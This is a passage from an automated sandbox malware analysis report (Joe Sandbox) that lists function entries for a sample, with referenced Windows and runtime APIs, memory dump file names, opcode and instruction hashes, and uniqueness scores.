                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00379288
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                            • Opcode ID: c50455448f6212aefba6dbeb43bbf18c90c9a38ddf061928018d89d8582c6e33
                                                                                                                                                                                            • Instruction ID: 816fb405953ca681c1976989ce58dd81ffd8c2673871caa70bf000bc455b5eb0
                                                                                                                                                                                            • Opcode Fuzzy Hash: c50455448f6212aefba6dbeb43bbf18c90c9a38ddf061928018d89d8582c6e33
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64418871900209AFDF26DF94CC81BAEBBB5BF48314F15829AF908AB261D3399950DF50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00356470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0035647E
                                                                                                                                                                                            • ___std_exception_destroy.LIBVCRUNTIME ref: 0035648D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy
                                                                                                                                                                                            • String ID: Te9
                                                                                                                                                                                            • API String ID: 4194217158-3548072084
                                                                                                                                                                                            • Opcode ID: 276c3ed79ba903fcb1f9c0186ebd5ad7f7b1303dcb56a273e68787e397f27329
                                                                                                                                                                                            • Instruction ID: 169bdbfa606ae6c29ed9f70013b6140ccefbccf590dc50631e742ed0110f6eab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 276c3ed79ba903fcb1f9c0186ebd5ad7f7b1303dcb56a273e68787e397f27329
                                                                                                                                                                                            • Instruction Fuzzy Hash: 99D012B5805B2447DB72AF24E83B88273EC6F153143054D1EE895A760AE7B4EE4C47A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%